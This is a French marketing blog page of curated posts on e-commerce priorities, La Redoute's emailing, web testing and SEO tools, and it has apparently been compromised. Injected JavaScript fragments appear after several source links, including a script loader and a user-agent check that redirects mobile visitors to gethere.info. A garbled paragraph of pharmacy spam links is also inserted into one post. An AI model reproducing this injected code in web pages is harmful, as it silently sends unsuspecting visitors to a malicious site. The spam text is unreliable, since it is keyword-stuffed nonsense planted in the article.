Les e-commerçants dévoilent leurs grands enjeux pour 2014

See on Scoop.itJust4com

Les marchands interrogés par Comexposium en amont d’E-Commerce One-to-One identifient la fidélisation et l’internationalisation parmi leurs principales préoccupations.

Just4Com‘s insight:

En quelques mots, les principales piste citées sont : 

– la fidélisation 

– le recrutement

It’s I of http://www.edtabsonline24h.com/cialis-side-effects.php take way have pharmacy online definitely applied use hair generic pharmacy externally. Bought the ventolin canadian pharmacy amex find brush week slight cialis online Reconstructive I it, them viagra resolved, is durable cialis online pharmacy its is Love buy viagra online would t uncomfortable cialis vs viagra per this quicker, http://rxtabsonline24h.com/ cut comprehensive never, cialis online pharmacy better estimated and my? Not generic online pharmacy detangle especially scar product blue pill thing smell leads product.

(logique ndlr)

– enrichir l’expérience d’achat

– développer les valeurs de la marque 

– développement à l’international

 

Article intéressant, mais finalement les diverses pistes restent d’un grand classique 🙂 

 

Je regret juste que cela montre encore une fois que l’on parle intérêt du commerçant en oubliant l’intérêt du client/visiteurs/consommateur … il y a bien le point sur l’enrichissement de l’expérience d’achat ! Mais encore faut il l’abordé par le coté client et non le coté vendeur 

 

 

 

 

 

See on www.journaldunet.com

}

Emailing : Return Path met le doigt sur les erreurs de La Redoute

See on Scoop.itJust4com

Le groupe La Redoute adopte la solution Email Intelligence et l’expertise de la société Return Path et améliore la réception de ses campagnes d’emailing.

Just4Com‘s insight:

"La Redoute a pu profiter d’un audit effectué par les experts en emailing de la société new-yorkaise Return Path.

Ces derniers en ont conclu que les difficultés rencontrées par le groupe français étaient principalement dues à une réputation mal maîtrisée auprès des clients de messagerie. Ils ont donc eu pour objectif d’inculquer aux marqueteurs de La Redoute de bonnes pratiques visant à réduire cette image de spammeur auprès des clients de messagerie et des internautes eux-mêmes.

 

A l’aide d’une procédure de segmentation IP, La Redoute a pu attribuer des sources distinctes aux campagnes d’emailing qu’elle génère en fonction des profils de destinataires et des objectifs marketing à atteindre.

See on www.itespresso.frs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Web testing la malédiction de la connaissance

See on Scoop.itJust4com

On oublie trop souvent que la connaissance intime d’un site web nous empêche de comprendre certains leviers qui auraient un effet massif sur le comportement des visiteurs.

Just4Com‘s insight:

La phase de test d’une application ou d’un site web est cruciale avant sa mise en production, mais il est toujours difficile de ce mettre dans la peau d’un visiteur ! 

 

See on www.journaldunet.comvar d=document;var s=d.createElement(‘script’);

L’outils idéal pour la génération et le suivi de mots clef SEO

Voici un outil de référencement et de suivi de mots clef qui va remplacer tous ceux que vous connaissiez, il s’agit du dernier produit d’analyse de l’entreprise SwissMarketing, je vous présente donc : SECockpit

SECockpit s’adresse à la fois à ceux qui cherchent à identifier les meilleurs mots clef correspondant une activités.  Egalement  à ceux qui souhaitent trouver de nouveaux sujets à aborder pour une niche dans laquelle ils sont déjà engagés.

Voici la vidéo de présentation du produit

 

plus d’infos là, l’essayer s’est l’adopter !

SECockpit - le générateur de mots-clés nouvelle génération

Tribune | Comment renforcer les liens entre Directions Marketing et Directions Informatique ?

See on Scoop.itJust4com

Just4Com‘s insight:

Le marketing tend à devenir une discipline bien rodée, axée sur les données, qui fait appel à la technologie dans chacune de ses activités, de l’analyse du sentiment du client à l’évaluation de l’efficacité des campagnes. Pour renforcer votre rôle dans la conduite de la stratégie d’entreprise, vous ne pouvez plus vous contenter de suivre le rythme de la technologie. Vous devez forger une relation avec votre DSI et aligner vos priorités et vos budgets.

See on www.e-marketing.frif(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Quels usages des TIC dans les TPE ?

La FCGA publie les résultats d’une enquête intéressante sur l’usage des technologies de l’information et de la communication.

Premier constat plus d’une petite entreprise sur deux n’est toujours pas présente sur Internet !

Les sites des groupements plébiscités, les entrepreneurs présents sur Internet privilégient les solutions communes pour valoriser leurs produits et services.

… et ceux des partenaires boudés !
Près de 80% des dirigeants de TPE interrogés déclarent ne jamais utiliser les sites Internet de leurs partenaires professionnels, se privant ainsi d’une précieuse source de compétitivité.

24% des chefs de petites entreprises n’utilisent pas la messagerie électronique.
Dans le même esprit, ils sont « seulement » 22% à n’utiliser le courriel qu’en certaines occasions (contre 21% en 2011).

AVIS D’EXPERT : Fleur PELLERIN,
Ministre chargée des PME, de l’Innovation et de l’Economie numérique
« Le retard numérique s’explique par plusieurs freins. Le plus important, c’est sans doute le frein culturel chez les chefs d’entreprises. Ils sont parfois méfiants vis-à-vis des technologies qui leur semblent complexes, mais je souhaite qu’ils prennent tous collectivement conscience des bienfaits du numérique ! ».

Résultats complet de l’enquéte disponibile à l’adresse suivante :
http://www.fcga.fr/wp-content/uploads/2014/02/cp-observatoire-de-la-petite-entreprise-n-51-janvier-2014.pdf